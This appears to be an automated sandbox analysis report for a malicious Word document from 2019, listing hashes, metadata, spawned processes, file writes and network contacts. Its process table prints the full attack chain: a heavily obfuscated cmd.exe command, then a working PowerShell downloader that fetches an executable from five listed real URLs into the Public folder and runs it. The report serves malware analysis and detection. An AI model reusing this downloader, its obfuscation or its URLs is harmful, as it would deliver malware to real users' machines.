File name: | eb9ad5bcd11c4e92e686d8f464ebca05f43ea16d123414c0fffcad88dd8fd5b1 |
Full analysis: | https://app.any.run/tasks/3eccc753-144d-42dd-8a10-99279ab20111 |
Verdict: | Malicious activity |
Analysis date: | July 18, 2019, 06:39:39 |
OS: | Windows 7 Professional Service Pack 1 (build: 7601, 32 bit) |
Tags: | |
Indicators: | |
MIME: | application/msword |
File info: | Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.1, Code page: 1252, Author: James-PC, Template: Normal.dotm, Revision Number: 1, Name of Creating Application: Microsoft Office Word, Create Time/Date: Wed Oct 3 22:03:00 2018, Last Saved Time/Date: Wed Oct 3 22:03:00 2018, Number of Pages: 1, Number of Words: 5, Number of Characters: 31, Security: 0 |
MD5: | C0B61D9AEB83F0C859A858E6699F1256 |
SHA1: | 69871036BD44D60177D330972B99329C4B744D11 |
SHA256: | EB9AD5BCD11C4E92E686D8F464EBCA05F43EA16D123414C0FFFCAD88DD8FD5B1 |
SSDEEP: | 1536:XptJlmrJpmxlRw99NBp+aVKBADqAoeNQ+Au9nCMhoIsSQjZ8HHiQAt:5te2dw99fCWn5N32xKiQA |
.doc | | | Microsoft Word document (54.2) |
---|---|---|
.doc | | | Microsoft Word document (old ver.) (32.2) |
CompObjUserType: | Microsoft Word 97-2003 Document |
---|---|
CompObjUserTypeLen: | 32 |
HeadingPairs: |
|
TitleOfParts: | - |
HyperlinksChanged: | No |
SharedDoc: | No |
LinksUpToDate: | No |
ScaleCrop: | No |
AppVersion: | 16 |
CharCountWithSpaces: | 35 |
Paragraphs: | 1 |
Lines: | 1 |
Company: | - |
CodePage: | Windows Latin 1 (Western European) |
Security: | None |
Characters: | 31 |
Words: | 5 |
Pages: | 1 |
ModifyDate: | 2018:10:03 21:03:00 |
CreateDate: | 2018:10:03 21:03:00 |
TotalEditTime: | - |
Software: | Microsoft Office Word |
RevisionNumber: | 1 |
LastModifiedBy: | - |
Template: | Normal.dotm |
Comments: | - |
Keywords: | - |
Author: | James-PC |
Subject: | - |
Title: | - |
PID | CMD | Path | Indicators | Parent process |
---|---|---|---|---|
3868 | "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\admin\AppData\Local\Temp\eb9ad5bcd11c4e92e686d8f464ebca05f43ea16d123414c0fffcad88dd8fd5b1.doc" | C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | — | explorer.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Microsoft Word Version: 14.0.6024.1000 | ||||
2200 | cmd /V^:/C"^s^e^t ^7^a^Q=^q^|^h^ ^sc^Y^ ^_^<^B^ ^H^P^'^ ^7^Bl^ ^8n^'^ ^zN^X^ ~^a^=^ Vn^K^ ^3^.^A^ N^I^|^ a^9^l^ ^E^=^k^ ^p^x^8^ ^.^P^&^ ^>^a^Q^ ^Jq)^ r^m^}^}cC^ ^}^s^@^{^{^,^4^t^h^S^6^\c^2^j^+^t^a^F^|^a^KN^:c^4^1^I^}^J^g^_^;^s^bnk^@^U^[^a^M^A^He^u^'^Ur)^yu^b^.^&^_^;^0n^F^jt^G-^o%v^Y^m;F^T^$^B^>^:^ ^i^z^9^m^O^k^a^e^g^'^Xtv^K^x^I^PC^p^-^*(^x^e9a^ ^k^8^X[^o^f^z^{v^ktvn^o)^P^I^f^bC^;^E^ ^*)^'^o^s^jN^t%^o^P^IC^m^Ek^_^$^I^f^b ^S^g^ ^,^F^`0V^]^f^Y^S^I^UPr%^i^J^$c^`^Y(^A^x^P^e^9^M^X^l^t^s^?^i^_^Sn^F^d^y#^d^&^ ^w^a^Y^>^?^o^TC^]^l^L^A^Hn^W^9^J^w^i^3^W^o^#^1^k^Dv)^b^.vC^H^d^@^J^x^z^T^M^<V^'^sX^$^|^$^=^{^6^8^z^y^IR^Dr^H^L^]^t^'^Q^9^{P~^U)^D^S^0^t^Z^~^JR^uG^8^L^w^T^X^$^P^q}^ ^6(^\n^8^`^;^i^|^;^5^ ^`^l^>V^Qs^D^S^_^$^.r^u^ n^$^K^Q^&(Y^u^=^h^{^?Vc^#^\p^a^P^ ^s^e^k^#^Fr^3(^O^o^a^ ^o^f^'^$^B^;^&bJ^'^wRv^e^6%r^x^ %^de^x^K^`^.r^F^-^'^D^U^?^+^z^@8^o^u^j^1^u^8^s^qc)(C^$^I^2^l^+^4^oR^'^O^,n^\R^$^K^'V^I/^+^D^;zcK^AL^i^*^[^i^l^:\%^b^ C^-^u^M^&^P^p^8^xR^:^[^I^hv^G^'^\n^<^o^d^e^9^k^D^$^y)^M=^g^G^d^j^M^#^Q^o^K^>^9^mo^>^M^$^~v^s^;e^W^i^'^U^Qd^9^yC^+^0^Jn^U^3^Kn^:^'%^g^Q ^?^4^O^=^p^FC^ nq^E^o^q^3^Xu^s^T^ycr^1N^$n^?^o^;^0^D^3)^6^P^w^'^K^f^.^@^A^Z^}^'^X^5*(^h(N^t^i^Gr^i^p^|Y^l^Z^m^f^p^h^J^A^Sv^k^4^.^me^5'^f^+^D^9^|_^W^s^9^0^=^G^8^y^g^f^Za^.^6^]^q%^t^&^B^0^0T^Inr^T^#^B/^HC^&a^U^i^,c^i^@^y^.^w^$^1^g^Z^?^jn^[^W^S^inR^h^km^4^p^k^`^kVn^t(^I^u^+^P^?^j^U^:^X/^<^Z^g/^Za^ ^:^*^_^@^p)^4^B^tv^m;^t^w^o^E^h^P^Q^u^@^[^y^`^9^4)^5/^ ^A^'^m^9^'^A^o^L#^~c^A^q^{^.^?^\^K^a^ 6^=^d^:^6^~n^H^<^h^a^@^o^D^k^&^j^w^a^`^,^en^@^=^_^a+^a^Tr9^g^{^mQ_^s^e^G^Q^$^l^@^F^q^a^`^a^@^.}c^+^w^B^S^2^w^l^2^p^w^?^k[/^\C^b/G^*^+^:^L^Sv^p^*/r^t^S^1%^t^$^O^0^h^a^j^{^@C^L^P^Y^e^2^W^p^K^sN^T^1^;^[^t^+^lR^U^u^0^x^s^L0^,^q^}N^e^b^4^K^O/n^g^l^m^m^2^B^o^p^$^jc^b^G^-^.^F^>^6^h^;^6/p^KR^O^t^$^a^er$/^w^o^#^P^E^p^M^x^'^s^q^F^On^F^2^s^a^\^*^]rV2^1^t^.}^D^o^S^L^I^mC^p^4^a^&^o^1^l^\ ^Ia^[+^z/^,^_^'/^4^1^P^:C^=^Q^p^d^p^>^tn^.^x^t^A^H^`^h^>^=n^@^t^A^f^tc%^s^X^$^8^Q^l^'^`^X^P^F^XN^D^x^:^[^1^a5)c^p^t^$/^s^X]^g^=^0^Mr^h^&^U^o^hX^T^.^Z^}m^eBc^ ^g^a^K^B^a^j^u^*^m^'^I^i^a^Y^z^l^d^@^L^<r^+^j^;^e^b^=^;^t^M^p^0^a^wn^Y^w^Bc^S^e^=^W^d^l^]q^_l^7^{^G^i^z^P^jv^#^u^5n^D^I^+^o^o^*(^s^t^X^A^k^M^+^pc^b^U)^a^@)^5^j^l^0^3^.R/%^w^y^k^0^w^6^@^|^w^j%^h/^b^YR/^Q^8^x^:^1^6^3^p^Z^X^&^t^z^KL^t^#^y^m^h^,^1^4^@^3^H^+^k^6(^En^$^m^q/^#^1^D^kB^on^u^q^k^D^.^w^|^8^oc^5^gc^+^9^D^.R^f^5n^o^j^|^o^U^a^7^i^ *c^t^Bb^]^o[^s^e^m^I^4^T^o^|n^5rR^0Cp/bm^s^W^t^I^s^'^P^o^e^9^;%n^h^d^+^i^e^b^Z^s^o*^3^u^k^'^}^b^y^G^:^l^I^F/^a^us^Oc^K^I^#^o^\^JR^l(^G^T/^kNE/N^$^9^:^H^T^7^p^*^o^T^t^U^5^\^t^?^J/^h^y^_^5^'^.C^]^=^Y^E$^t%^p^{R^W^\^i^L^A^.^&^$^o^u^x^;^f^L^J^t^*^-^}n^d^;^g^e^U^$^aiR^1^`l^ln^7C^g^[^ ^b^7^G^o^e^{R^H^W^7^i^E^.^W^T^p^t^B^3^d^e^_c^4N^E^6^1^ ^4^l^z^t^X^0Vc^6^?^E^ec^5^j^j^L^>^w^b%^Q^A^o^Q^F^w-^S^W^#^w^@^~^O^e^i^<^sn^e^#^g^=^<^g^;^d^8R^e^z^~^S^PV^Er)^$n-^<^ ^x^~^0^l^&^}^o^l^tw^S^e^@^yJ^h^g_^[^sc^X^Tr^B^d^U^eC^G^E^w^-Vv^o^+^&^j^p&&^for /^L %^U ^in (^1^56^7^;^-^4^;^3)^d^o ^s^e^t v^E=!v^E!!^7^a^Q:~%^U,1!&&^i^f %^U ^l^e^q ^3 c^a^l^l %v^E:^~^-^3^9^2%" | C:\Windows\system32\cmd.exe | — | WINWORD.EXE |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows Command Processor Exit code: 0 Version: 6.1.7601.17514 (win7sp1_rtm.101119-1850) | ||||
1812 | powershell $Vzd=new-object Net.WebClient;$LRt='http://localbusinesspromotion.co.uk/nk@http://www.jacksonvillewaterdamage.org/c1DPlXt@http://alamotransportph.com/bqsUtTpY@http://www.alemranakanda.com/9@http://junkking.ca/r0t6fGs9'.Split('@');$cuo = '309';$moj=$env:public+'\'+$cuo+'.exe';foreach($rSV in $LRt){try{$Vzd.DownloadFile($rSV, $moj);Invoke-Item $moj;break;}catch{}} | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | cmd.exe | |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows PowerShell Exit code: 0 Version: 6.1.7600.16385 (win7_rtm.090713-1255) | ||||
2528 | "C:\Windows\system32\ntvdm.exe" -i1 | C:\Windows\system32\ntvdm.exe | — | powershell.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: NTVDM.EXE Exit code: 3221225477 Version: 6.1.7600.16385 (win7_rtm.090713-1255) |
PID | Process | Filename | Type | |
---|---|---|---|---|
3868 | WINWORD.EXE | C:\Users\admin\AppData\Local\Temp\CVRF7BE.tmp.cvr | — | |
MD5:— | SHA256:— | |||
1812 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\NOJEAY72ZZOT73DV1RZ9.temp | — | |
MD5:— | SHA256:— | |||
2528 | ntvdm.exe | C:\Users\admin\AppData\Local\Temp\scsFEA.tmp | — | |
MD5:— | SHA256:— | |||
2528 | ntvdm.exe | C:\Users\admin\AppData\Local\Temp\scsFEB.tmp | — | |
MD5:— | SHA256:— | |||
1812 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms | binary | |
MD5:E4D9C442DD447A8FA05F9CFE88FCBB69 | SHA256:EDD7D7597C6C79A1DFD3229A1FA23433329B1D8399EB558623FFF948D3BB4036 | |||
3868 | WINWORD.EXE | C:\Users\admin\AppData\Roaming\Microsoft\Templates\~$Normal.dotm | pgc | |
MD5:2C39A189637295DD923019C1183D4B0D | SHA256:8C646733D9EAE60486E0A22F4893A17C0AE06C280488BCE0A6A697F53A565338 | |||
3868 | WINWORD.EXE | C:\Users\admin\AppData\Local\Temp\~$9ad5bcd11c4e92e686d8f464ebca05f43ea16d123414c0fffcad88dd8fd5b1.doc | pgc | |
MD5:F574C68E2B44F02BE40A2DD285B31378 | SHA256:CF70432D6B766E63AAD23A25D44AE7EB455BA966540EB43808CEBF0164E4EC6D | |||
1812 | powershell.exe | C:\Users\Public\309.exe | html | |
MD5:31B75F5FA0288F4873A68C41E7FE348E | SHA256:CA95BA43361559D0D99761E60BBA92DFB152BF90327FA3946A43F99B8F98B271 | |||
1812 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms~RFe04af.TMP | binary | |
MD5:E4D9C442DD447A8FA05F9CFE88FCBB69 | SHA256:EDD7D7597C6C79A1DFD3229A1FA23433329B1D8399EB558623FFF948D3BB4036 |
PID | Process | Method | HTTP Code | IP | URL | CN | Type | Size | Reputation |
---|---|---|---|---|---|---|---|---|---|
1812 | powershell.exe | GET | 301 | 66.206.38.173:80 | http://localbusinesspromotion.co.uk/nk | US | html | 247 b | malicious |
1812 | powershell.exe | GET | 200 | 198.48.62.1:80 | http://www.jacksonvillewaterdamage.org/ | US | html | 30.9 Kb | unknown |
1812 | powershell.exe | GET | 301 | 198.48.62.1:80 | http://www.jacksonvillewaterdamage.org/c1DPlXt | US | — | — | unknown |
1812 | powershell.exe | GET | 404 | 66.206.38.173:80 | http://localbusinesspromotion.co.uk/nk/ | US | html | 48.2 Kb | malicious |
PID | Process | IP | Domain | ASN | CN | Reputation |
---|---|---|---|---|---|---|
1812 | powershell.exe | 66.206.38.173:80 | localbusinesspromotion.co.uk | Turnkey Internet Inc. | US | malicious |
1812 | powershell.exe | 198.48.62.1:80 | www.jacksonvillewaterdamage.org | Turnkey Internet Inc. | US | unknown |
Domain | IP | Reputation |
---|---|---|
localbusinesspromotion.co.uk |
| malicious |
www.jacksonvillewaterdamage.org |
| unknown |